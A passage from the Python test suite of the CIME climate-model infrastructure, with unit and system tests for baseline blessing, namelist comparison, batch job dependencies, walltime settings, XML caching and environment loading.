if "TESTRUNDIFF_ALTERNATE" in os.environ:
del os.environ["TESTRUNDIFF_ALTERNATE"]
os.umask(self._orig_umask)
###############################################################################
def test_bless_test_results(self):
###############################################################################
# Generate some baselines
test_name = "TESTRUNDIFF_P1.f19_g16_rx1.A"
if CIME.utils.get_model() == "e3sm":
genargs = ["-g", "-o", "-b", self._baseline_name, test_name]
compargs = ["-c", "-b", self._baseline_name, test_name]
else:
genargs = ["-g", self._baseline_name, "-o", test_name,
"--baseline-root ", self._baseline_area]
compargs = ["-c", self._baseline_name, test_name,
"--baseline-root ", self._baseline_area]
self._create_test(genargs)
# Hist compare should pass
self._create_test(compargs)
# Change behavior
os.environ["TESTRUNDIFF_ALTERNATE"] = "True"
# Hist compare should now fail
test_id = "%s-%s" % (self._baseline_name, CIME.utils.get_timestamp())
self._create_test(compargs, test_id=test_id, run_errors=True)
# compare_test_results should detect the fail
cpr_cmd = "{}/compare_test_results --test-root {} -t {} 2>&1" \
.format(TOOLS_DIR, TEST_ROOT, test_id)
output = run_cmd_assert_result(self, cpr_cmd, expected_stat=CIME.utils.TESTS_FAILED_ERR_CODE)
# use regex
expected_pattern = re.compile(r'FAIL %s[^\s]* BASELINE' % test_name)
the_match = expected_pattern.search(output)
self.assertNotEqual(the_match, None,
msg="Cmd '%s' failed to display failed test in output:\n%s" % (cpr_cmd, output))
# Bless
run_cmd_no_fail("{}/bless_test_results --test-root {} --hist-only --force -t {}"
.format(TOOLS_DIR, TEST_ROOT, test_id))
# Hist compare should now pass again
self._create_test(compargs)
verify_perms(self, self._baseline_area)
###############################################################################
def test_rebless_namelist(self):
###############################################################################
# Generate some namelist baselines
test_to_change = "TESTRUNPASS_P1.f19_g16_rx1.A"
if CIME.utils.get_model() == "e3sm":
genargs = ["-n", "-g", "-o", "-b", self._baseline_name, "cime_test_only_pass"]
compargs = ["-n", "-c", "-b", self._baseline_name, "cime_test_only_pass"]
else:
genargs = ["-n", "-g", self._baseline_name, "-o", "cime_test_only_pass"]
compargs = ["-n", "-c", self._baseline_name, "cime_test_only_pass"]
self._create_test(genargs)
# Basic namelist compare
test_id = "%s-%s" % (self._baseline_name, CIME.utils.get_timestamp())
self._create_test(compargs, test_id=test_id)
# Check standalone case.cmpgen_namelists
casedir = os.path.join(self._testroot,
"%s.C.%s" % (CIME.utils.get_full_test_name(test_to_change, machine=self._machine, compiler=self._compiler), test_id))
run_cmd_assert_result(self, "./case.cmpgen_namelists", from_dir=casedir)
# compare_test_results should pass
cpr_cmd = "{}/compare_test_results --test-root {} -n -t {} 2>&1" \
.format(TOOLS_DIR, TEST_ROOT, test_id)
output = run_cmd_assert_result(self, cpr_cmd)
# use regex
expected_pattern = re.compile(r'PASS %s[^\s]* NLCOMP' % test_to_change)
the_match = expected_pattern.search(output)
self.assertNotEqual(the_match, None,
msg="Cmd '%s' failed to display passed test in output:\n%s" % (cpr_cmd, output))
# Modify namelist
fake_nl = """
&fake_nml
fake_item = 'fake'
fake = .true.
/"""
baseline_area = self._baseline_area
baseline_glob = glob.glob(os.path.join(baseline_area, self._baseline_name, "TEST*"))
self.assertEqual(len(baseline_glob), 3, msg="Expected three matches, got:\n%s" % "\n".join(baseline_glob))
for baseline_dir in baseline_glob:
nl_path = os.path.join(baseline_dir, "CaseDocs", "datm_in")
self.assertTrue(os.path.isfile(nl_path), msg="Missing file %s" % nl_path)
os.chmod(nl_path, osstat.S_IRUSR | osstat.S_IWUSR)
with open(nl_path, "a") as nl_file:
nl_file.write(fake_nl)
# Basic namelist compare should now fail
test_id = "%s-%s" % (self._baseline_name, CIME.utils.get_timestamp())
self._create_test(compargs, test_id=test_id, pre_run_errors=True)
casedir = os.path.join(self._testroot,
"%s.C.%s" % (CIME.utils.get_full_test_name(test_to_change, machine=self._machine, compiler=self._compiler), test_id))
run_cmd_assert_result(self, "./case.cmpgen_namelists", from_dir=casedir, expected_stat=100)
# preview namelists should work
run_cmd_assert_result(self, "./preview_namelists", from_dir=casedir)
# This should still fail
run_cmd_assert_result(self, "./case.cmpgen_namelists", from_dir=casedir, expected_stat=100)
# compare_test_results should fail
cpr_cmd = "{}/compare_test_results --test-root {} -n -t {} 2>&1" \
.format(TOOLS_DIR, TEST_ROOT, test_id)
output = run_cmd_assert_result(self, cpr_cmd, expected_stat=CIME.utils.TESTS_FAILED_ERR_CODE)
# use regex
expected_pattern = re.compile(r'FAIL %s[^\s]* NLCOMP' % test_to_change)
the_match = expected_pattern.search(output)
self.assertNotEqual(the_match, None,
msg="Cmd '%s' failed to display passed test in output:\n%s" % (cpr_cmd, output))
# Bless
run_cmd_no_fail("{}/bless_test_results --test-root {} -n --force -t {}"
.format(TOOLS_DIR, TEST_ROOT, test_id))
# Basic namelist compare should now pass again
self._create_test(compargs)
verify_perms(self, self._baseline_area)
class X_TestQueryConfig(unittest.TestCase):
def test_query_compsets(self):
run_cmd_no_fail("{}/query_config --compsets".format(SCRIPT_DIR))
def test_query_components(self):
run_cmd_no_fail("{}/query_config --components".format(SCRIPT_DIR))
def test_query_grids(self):
run_cmd_no_fail("{}/query_config --grids".format(SCRIPT_DIR))
def test_query_machines(self):
run_cmd_no_fail("{}/query_config --machines".format(SCRIPT_DIR))
###############################################################################
class Z_FullSystemTest(TestCreateTestCommon):
###############################################################################
###########################################################################
def test_full_system(self):
###########################################################################
# Put this inside any test that's slow
if (FAST_ONLY):
self.skipTest("Skipping slow test")
self._create_test(["--walltime=0:15:00", "cime_developer"], test_id=self._baseline_name)
run_cmd_assert_result(self, "%s/cs.status.%s" % (self._testroot, self._baseline_name),
from_dir=self._testroot)
# Ensure that we can get test times
test_statuses = glob.glob(os.path.join(self._testroot, "*%s" % self._baseline_name, "TestStatus"))
for test_status in test_statuses:
test_time = CIME.wait_for_tests.get_test_time(os.path.dirname(test_status))
self.assertIs(type(test_time), int, msg="get time did not return int for %s" % test_status)
self.assertTrue(test_time > 0, msg="test time was not positive for %s" % test_status)
# Test that re-running works
tests = get_tests.get_test_suite("cime_developer", machine=self._machine, compiler=self._compiler)
for test in tests:
casedir = os.path.join(TEST_ROOT, "%s.%s" % (test, self._baseline_name))
# Subtle issue: The run phases of these tests will be in the PASS state until
# the submitted case.test script is run, which could take a while if the system is
# busy. This potentially leaves a window where the wait_for_tests command below will
# not wait for the re-submitted jobs to run because it sees the original PASS.
# The code below forces things back to PEND to avoid this race condition. Note
# that we must use the MEMLEAK phase, not the RUN phase, because RUN being in a non-PEND
# state is how system tests know they are being re-run and must reset certain
# case settings.
if self._hasbatch:
with TestStatus(test_dir=casedir) as ts:
ts.set_status(MEMLEAK_PHASE, TEST_PEND_STATUS)
run_cmd_assert_result(self, "./case.submit --skip-preview-namelist", from_dir=casedir)
self._wait_for_tests(self._baseline_name)
###############################################################################
class K_TestCimeCase(TestCreateTestCommon):
###############################################################################
###########################################################################
def test_cime_case(self):
###########################################################################
self._create_test(["--no-build", "TESTRUNPASS_P1.f19_g16_rx1.A"], test_id=self._baseline_name)
self.assertEqual(type(MACHINE.get_value("MAX_TASKS_PER_NODE")), int)
self.assertTrue(type(MACHINE.get_value("PROJECT_REQUIRED")) in [type(None), bool])
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS_P1.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
with Case(casedir, read_only=False) as case:
build_complete = case.get_value("BUILD_COMPLETE")
self.assertFalse(build_complete,
msg="Build complete had wrong value '%s'" %
build_complete)
case.set_value("BUILD_COMPLETE", True)
build_complete = case.get_value("BUILD_COMPLETE")
self.assertTrue(build_complete,
msg="Build complete had wrong value '%s'" %
build_complete)
case.flush()
build_complete = run_cmd_no_fail("./xmlquery BUILD_COMPLETE --value",
from_dir=casedir)
self.assertEqual(build_complete, "TRUE",
msg="Build complete had wrong value '%s'" %
build_complete)
# Test some test properties
self.assertEqual(case.get_value("TESTCASE"), "TESTRUNPASS")
def _batch_test_fixture(self, testcase_name):
if not MACHINE.has_batch_system() or NO_BATCH:
self.skipTest("Skipping testing user prerequisites without batch systems")
testdir = os.path.join(TEST_ROOT, testcase_name)
if os.path.exists(testdir):
shutil.rmtree(testdir)
args = "--case {name} --script-root {testdir} --compset X --res f19_g16 --handle-preexisting-dirs=r --output-root {testdir}".format(name=testcase_name, testdir=testdir)
if CIME.utils.get_cime_default_driver() == 'nuopc':
args += " --run-unsupported"
run_cmd_assert_result(self, "{}/create_newcase {}".format(SCRIPT_DIR, args),
from_dir=SCRIPT_DIR)
run_cmd_assert_result(self, "./case.setup", from_dir=testdir)
return testdir
###########################################################################
def test_cime_case_prereq(self):
###########################################################################
testcase_name = 'prereq_test'
testdir = self._batch_test_fixture(testcase_name)
with Case(testdir, read_only=False) as case:
if case.get_value("depend_string") is None:
self.skipTest("Skipping prereq test, depend_string was not provided for this batch system")
job_name = "case.run"
prereq_name = 'prereq_test'
batch_commands = case.submit_jobs(prereq=prereq_name, job=job_name, skip_pnl=True, dry_run=True)
self.assertTrue(isinstance(batch_commands, collections.Sequence), "case.submit_jobs did not return a sequence for a dry run")
self.assertTrue(len(batch_commands) > 0, "case.submit_jobs did not return any job submission string")
# The first element in the internal sequence should just be the job name
# The second one (batch_cmd_index) should be the actual batch submission command
batch_cmd_index = 1
# The prerequisite should be applied to all jobs, though we're only expecting one
for batch_cmd in batch_commands:
self.assertTrue(isinstance(batch_cmd, collections.Sequence), "case.submit_jobs did not return a sequence of sequences")
self.assertTrue(len(batch_cmd) > batch_cmd_index, "case.submit_jobs returned internal sequences with length <= {}".format(batch_cmd_index))
self.assertTrue(isinstance(batch_cmd[batch_cmd_index], six.string_types), "case.submit_jobs returned internal sequences without the batch command string as the second parameter: {}".format(batch_cmd[batch_cmd_index]))
batch_cmd_args = batch_cmd[batch_cmd_index]
jobid_ident = "jobid"
dep_str_fmt = case.get_env('batch').get_value('depend_string', subgroup=None)
self.assertTrue(jobid_ident in dep_str_fmt, "dependency string doesn't include the jobid identifier {}".format(jobid_ident))
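# Hedged illustration: depend_string is batch-system specific; typical values look like
# "-W depend=afterok:jobid" (PBS) or "--dependency=afterok:jobid" (Slurm). The parsing
# below strips everything from the "jobid" placeholder onward and then scans the
# generated submission command for the user-supplied prerequisite id.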
dep_str = dep_str_fmt[:dep_str_fmt.index(jobid_ident)]
prereq_substr = None
while dep_str in batch_cmd_args:
dep_id_pos = batch_cmd_args.find(dep_str) + len(dep_str)
batch_cmd_args = batch_cmd_args[dep_id_pos:]
prereq_substr = batch_cmd_args[:len(prereq_name)]
if prereq_substr == prereq_name:
break
self.assertTrue(prereq_substr is not None and prereq_name in prereq_substr, "Dependencies added, but not the user specified one")
###########################################################################
def test_cime_case_allow_failed_prereq(self):
###########################################################################
testcase_name = 'allow_failed_prereq_test'
testdir = self._batch_test_fixture(testcase_name)
with Case(testdir, read_only=False) as case:
depend_allow = case.get_value("depend_allow_string")
if depend_allow is None:
self.skipTest("Skipping allow_failed_prereq test, depend_allow_string was not provided for this batch system")
job_name = "case.run"
prereq_name = "prereq_allow_fail_test"
depend_allow = depend_allow.replace("jobid", prereq_name)
batch_commands = case.submit_jobs(prereq=prereq_name, allow_fail=True, job=job_name, skip_pnl=True, dry_run=True)
self.assertTrue(isinstance(batch_commands, collections.Sequence), "case.submit_jobs did not return a sequence for a dry run")
num_submissions = 1
if case.get_value("DOUT_S"):
num_submissions = 2
self.assertTrue(len(batch_commands) == num_submissions, "case.submit_jobs did not return any job submission strings")
self.assertTrue(depend_allow in batch_commands[0][1])
###########################################################################
def test_cime_case_resubmit_immediate(self):
###########################################################################
testcase_name = 'resubmit_immediate_test'
testdir = self._batch_test_fixture(testcase_name)
with Case(testdir, read_only=False) as case:
depend_string = case.get_value("depend_string")
if depend_string is None:
self.skipTest("Skipping resubmit_immediate test, depend_string was not provided for this batch system")
depend_string = re.sub('jobid.*$','',depend_string)
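# Hedged illustration: the substitution above turns a template such as
# "-W depend=afterok:jobid" into the prefix "-W depend=afterok:", which each
# resubmitted job's command line should contain when chained to its predecessor.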
job_name = "case.run"
num_submissions = 6
case.set_value("RESUBMIT", num_submissions - 1)
batch_commands = case.submit_jobs(job=job_name, skip_pnl=True, dry_run=True, resubmit_immediate=True)
self.assertTrue(isinstance(batch_commands, collections.Sequence), "case.submit_jobs did not return a sequence for a dry run")
if case.get_value("DOUT_S"):
num_submissions = 12
self.assertTrue(len(batch_commands) == num_submissions, "case.submit_jobs did not return {} submitted jobs".format(num_submissions))
for i, cmd in enumerate(batch_commands):
if i > 0:
self.assertTrue(depend_string in cmd[1])
###########################################################################
def test_cime_case_st_archive_resubmit(self):
###########################################################################
testcase_name = "st_archive_resubmit_test"
testdir = self._batch_test_fixture(testcase_name)
with Case(testdir, read_only=False) as case:
case.case_setup(clean=False, test_mode=False, reset=True)
orig_resubmit = 2
case.set_value("RESUBMIT", orig_resubmit)
case.case_st_archive(resubmit=False)
new_resubmit = case.get_value("RESUBMIT")
self.assertTrue(orig_resubmit == new_resubmit, "st_archive resubmitted when told not to")
case.case_st_archive(resubmit=True)
new_resubmit = case.get_value("RESUBMIT")
self.assertTrue((orig_resubmit - 1) == new_resubmit, "st_archive did not resubmit when told to")
###########################################################################
def test_cime_case_build_threaded_1(self):
###########################################################################
self._create_test(["--no-build", "TESTRUNPASS_P1x1.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS_P1x1.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
with Case(casedir, read_only=False) as case:
build_threaded = case.get_value("SMP_PRESENT")
self.assertFalse(build_threaded)
build_threaded = case.get_build_threaded()
self.assertFalse(build_threaded)
case.set_value("FORCE_BUILD_SMP", True)
build_threaded = case.get_build_threaded()
self.assertTrue(build_threaded)
###########################################################################
def test_cime_case_build_threaded_2(self):
###########################################################################
self._create_test(["--no-build", "TESTRUNPASS_P1x2.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS_P1x2.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
with Case(casedir, read_only=False) as case:
build_threaded = case.get_value("SMP_PRESENT")
self.assertTrue(build_threaded)
build_threaded = case.get_build_threaded()
self.assertTrue(build_threaded)
###########################################################################
def test_cime_case_mpi_serial(self):
###########################################################################
self._create_test(["--no-build", "TESTRUNPASS_Mmpi-serial_P10.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS_Mmpi-serial_P10.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
with Case(casedir, read_only=True) as case:
# Serial cases should not be using pnetcdf
self.assertEqual(case.get_value("CPL_PIO_TYPENAME"), "netcdf")
# Serial cases should be using 1 task
self.assertEqual(case.get_value("TOTALPES"), 1)
self.assertEqual(case.get_value("NTASKS_CPL"), 1)
###########################################################################
def test_cime_case_force_pecount(self):
###########################################################################
self._create_test(["--no-build", "--force-procs=16", "--force-threads=8", "TESTRUNPASS.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS_P16x8.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
with Case(casedir, read_only=True) as case:
self.assertEqual(case.get_value("NTASKS_CPL"), 16)
self.assertEqual(case.get_value("NTHRDS_CPL"), 8)
###########################################################################
def test_cime_case_xmlchange_append(self):
###########################################################################
self._create_test(["--no-build", "TESTRUNPASS_P1x1.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS_P1x1.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
run_cmd_assert_result(self, "./xmlchange --id PIO_CONFIG_OPTS --val='-opt1'", from_dir=casedir)
result = run_cmd_assert_result(self, "./xmlquery --value PIO_CONFIG_OPTS", from_dir=casedir)
self.assertEqual(result, "-opt1")
run_cmd_assert_result(self, "./xmlchange --id PIO_CONFIG_OPTS --val='-opt2' --append", from_dir=casedir)
result = run_cmd_assert_result(self, "./xmlquery --value PIO_CONFIG_OPTS", from_dir=casedir)
self.assertEqual(result, "-opt1 -opt2")
###########################################################################
def test_cime_case_test_walltime_mgmt_1(self):
###########################################################################
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping walltime test. Depends on E3SM batch settings")
test_name = "ERS.f19_g16_rx1.A"
machine, compiler = "blues", "gnu"
self._create_test(["--no-setup", "--machine={}".format(machine), test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=machine, compiler=compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "0:10:00")
result = run_cmd_assert_result(self, "./xmlquery JOB_QUEUE --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "batch")
###########################################################################
def test_cime_case_test_walltime_mgmt_2(self):
###########################################################################
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping walltime test. Depends on E3SM batch settings")
test_name = "ERS_P64.f19_g16_rx1.A"
machine, compiler = "blues", "gnu"
self._create_test(["--no-setup", "--machine={}".format(machine), test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=machine, compiler=compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "03:00:00")
result = run_cmd_assert_result(self, "./xmlquery JOB_QUEUE --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "batch")
###########################################################################
def test_cime_case_test_walltime_mgmt_3(self):
###########################################################################
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping walltime test. Depends on E3SM batch settings")
test_name = "ERS_P64.f19_g16_rx1.A"
machine, compiler = "blues", "gnu"
self._create_test(["--no-setup", "--machine={}".format(machine), "--walltime=0:10:00", test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=machine, compiler=compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "0:10:00")
result = run_cmd_assert_result(self, "./xmlquery JOB_QUEUE --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "batch") # Not smart enough to select faster queue
###########################################################################
def test_cime_case_test_walltime_mgmt_4(self):
###########################################################################
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping walltime test. Depends on E3SM batch settings")
test_name = "ERS_P1.f19_g16_rx1.A"
machine, compiler = "blues", "gnu"
self._create_test(["--no-setup", "--machine={}".format(machine), "--walltime=2:00:00", test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=machine, compiler=compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "2:00:00")
result = run_cmd_assert_result(self, "./xmlquery JOB_QUEUE --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "batch")
###########################################################################
def test_cime_case_test_walltime_mgmt_5(self):
###########################################################################
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping walltime test. Depends on E3SM batch settings")
test_name = "ERS_P1.f19_g16_rx1.A"
machine, compiler = "blues", "gnu"
self._create_test(["--no-setup", "--machine={}".format(machine), test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=machine, compiler=compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
run_cmd_assert_result(self, "./xmlchange JOB_QUEUE=slartibartfast --subgroup=case.test", from_dir=casedir, expected_stat=1)
run_cmd_assert_result(self, "./xmlchange JOB_QUEUE=slartibartfast --force --subgroup=case.test", from_dir=casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "03:00:00")
result = run_cmd_assert_result(self, "./xmlquery JOB_QUEUE --subgroup=case.test --value", from_dir=casedir)
self.assertEqual(result, "slartibartfast")
###########################################################################
def test_cime_case_test_walltime_mgmt_6(self):
###########################################################################
if not self._hasbatch:
self.skipTest("Skipping walltime test. Depends on batch system")
test_name = "ERS_P1.f19_g16_rx1.A"
self._create_test(["--no-build", test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
run_cmd_assert_result(self, "./xmlchange JOB_WALLCLOCK_TIME=421:32:11 --subgroup=case.test", from_dir=casedir)
run_cmd_assert_result(self, "./case.setup --reset", from_dir=casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
with Case(casedir) as case:
walltime_format = case.get_value("walltime_format", subgroup=None)
if walltime_format is not None and walltime_format.count(":") == 1:
self.assertEqual(result, "421:32")
else:
self.assertEqual(result, "421:32:11")
###########################################################################
def test_cime_case_test_walltime_mgmt_7(self):
###########################################################################
if not self._hasbatch:
self.skipTest("Skipping walltime test. Depends on batch system")
test_name = "ERS_P1.f19_g16_rx1.A"
self._create_test(["--no-build", "--walltime=01:00:00", test_name], test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
run_cmd_assert_result(self, "./xmlchange JOB_WALLCLOCK_TIME=421:32:11 --subgroup=case.test", from_dir=casedir)
run_cmd_assert_result(self, "./case.setup --reset", from_dir=casedir)
result = run_cmd_assert_result(self, "./xmlquery JOB_WALLCLOCK_TIME --subgroup=case.test --value", from_dir=casedir)
with Case(casedir) as case:
walltime_format = case.get_value("walltime_format", subgroup=None)
if walltime_format is not None and walltime_format.count(":") == 1:
self.assertEqual(result, "421:32")
else:
self.assertEqual(result, "421:32:11")
###########################################################################
def test_cime_case_test_custom_project(self):
###########################################################################
test_name = "ERS_P1.f19_g16_rx1.A"
machine, compiler = "melvin", "gnu" # have to use a machine both models know and one that doesn't put PROJECT in any key paths
self._create_test(["--no-setup", "--machine={}".format(machine), "--compiler={}".format(compiler), "--project=testproj", test_name],
test_id=self._baseline_name,
env_changes="unset CIME_GLOBAL_WALLTIME &&")
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name(test_name, machine=machine, compiler=compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
result = run_cmd_assert_result(self, "./xmlquery --value PROJECT --subgroup=case.test", from_dir=casedir)
self.assertEqual(result, "testproj")
###########################################################################
def test_create_test_longname(self):
###########################################################################
self._create_test(["SMS.f19_g16.2000_SATM_XLND_SICE_SOCN_XROF_XGLC_SWAV", "--no-build"])
###########################################################################
def test_env_loading(self):
###########################################################################
if self._machine != "melvin":
self.skipTest("Skipping env load test - Only works on melvin")
self._create_test(["--no-build", "TESTRUNPASS.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
with Case(casedir, read_only=True) as case:
env_mach = case.get_env("mach_specific")
orig_env = dict(os.environ)
env_mach.load_env(case)
module_env = dict(os.environ)
os.environ.clear()
os.environ.update(orig_env)
env_mach.load_env(case, force_method="generic")
generic_env = dict(os.environ)
os.environ.clear()
os.environ.update(orig_env)
problems = ""
for mkey, mval in module_env.items():
if mkey not in generic_env:
if not mkey.startswith("PS") and mkey != "OLDPWD":
problems += "Generic missing key: {}\n".format(mkey)
elif mval != generic_env[mkey] and mkey not in ["_", "SHLVL", "PWD"] and not mkey.endswith("()"):
problems += "Value mismatch for key {}: {} != {}\n".format(mkey, repr(mval), repr(generic_env[mkey]))
for gkey in generic_env.keys():
if gkey not in module_env:
problems += "Modules missing key: {}\n".format(gkey)
self.assertEqual(problems, "", msg=problems)
###########################################################################
def test_case_submit_interface(self):
###########################################################################
try:
import imp
except ImportError:
print("imp not found, skipping case.submit interface test")
return
# the current directory may not exist, so make sure we are in a real directory
os.chdir(os.getenv("HOME"))
sys.path.append(TOOLS_DIR)
case_submit_path = os.path.join(TOOLS_DIR, "case.submit")
submit_interface = imp.load_source("case_submit_interface", case_submit_path)
sys.argv = ["case.submit", "--batch-args", "'random_arguments_here.%j'",
"--mail-type", "fail", "--mail-user", "'random_arguments_here.%j'"]
submit_interface._main_func(None, True)
###########################################################################
def test_xml_caching(self):
###########################################################################
self._create_test(["--no-build", "TESTRUNPASS.f19_g16_rx1.A"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"%s.%s" % (CIME.utils.get_full_test_name("TESTRUNPASS.f19_g16_rx1.A", machine=self._machine, compiler=self._compiler), self._baseline_name))
self.assertTrue(os.path.isdir(casedir), msg="Missing casedir '%s'" % casedir)
active = os.path.join(casedir, "env_run.xml")
backup = os.path.join(casedir, "env_run.xml.bak")
safe_copy(active, backup)
with Case(casedir, read_only=False) as case:
env_run = EnvRun(casedir, read_only=True)
self.assertEqual(case.get_value("RUN_TYPE"), "startup")
case.set_value("RUN_TYPE", "branch")
self.assertEqual(case.get_value("RUN_TYPE"), "branch")
self.assertEqual(env_run.get_value("RUN_TYPE"), "branch")
with Case(casedir) as case:
self.assertEqual(case.get_value("RUN_TYPE"), "branch")
time.sleep(0.2)
safe_copy(backup, active)
with Case(casedir, read_only=False) as case:
self.assertEqual(case.get_value("RUN_TYPE"), "startup")
case.set_value("RUN_TYPE", "branch")
with Case(casedir, read_only=False) as case:
self.assertEqual(case.get_value("RUN_TYPE"), "branch")
time.sleep(0.2)
safe_copy(backup, active)
case.read_xml() # Manual re-sync
self.assertEqual(case.get_value("RUN_TYPE"), "startup")
case.set_value("RUN_TYPE", "branch")
self.assertEqual(case.get_value("RUN_TYPE"), "branch")
with Case(casedir) as case:
self.assertEqual(case.get_value("RUN_TYPE"), "branch")
time.sleep(0.2)
safe_copy(backup, active)
env_run = EnvRun(casedir, read_only=True)
self.assertEqual(env_run.get_value("RUN_TYPE"), "startup")
with Case(casedir, read_only=False) as case:
self.assertEqual(case.get_value("RUN_TYPE"), "startup")
case.set_value("RUN_TYPE", "branch")
# Detect out-of-band ("behind the back") modification of the XML file
with self.assertRaises(CIMEError):
with Case(casedir, read_only=False) as case:
time.sleep(0.2)
safe_copy(backup, active)
with Case(casedir, read_only=False) as case:
case.set_value("RUN_TYPE", "branch")
with self.assertRaises(CIMEError):
with Case(casedir) as case:
time.sleep(0.2)
safe_copy(backup, active)
###########################################################################
def test_configure(self):
###########################################################################
self._create_test(["SMS.f09_g16.X", "--no-build"], test_id=self._baseline_name)
casedir = os.path.join(self._testroot,
"{}.{}".format(CIME.utils.get_full_test_name("SMS.f09_g16.X", machine=self._machine, compiler=self._compiler), self._baseline_name))
manual_config_dir = os.path.join(casedir, "manual_config")
os.mkdir(manual_config_dir)
run_cmd_no_fail("{} --machine={} --compiler={}".format(os.path.join(get_cime_root(), "tools", "configure"), self._machine, self._compiler), from_dir=manual_config_dir)
with open(os.path.join(casedir, "env_mach_specific.xml"), "r") as fd:
case_env_contents = fd.read()
with open(os.path.join(manual_config_dir, "env_mach_specific.xml"), "r") as fd:
man_env_contents = fd.read()
self.assertEqual(case_env_contents, man_env_contents)
###############################################################################
class X_TestSingleSubmit(TestCreateTestCommon):
###############################################################################
###########################################################################
def test_single_submit(self):
###########################################################################
# Skip unless on a batch system and users did not select no-batch
if (not self._hasbatch):
self.skipTest("Skipping single submit. Not valid without batch")
if CIME.utils.get_model() != "e3sm":
self.skipTest("Skipping single submit. E3SM experimental feature")
if self._machine not in ["sandiatoss3"]:
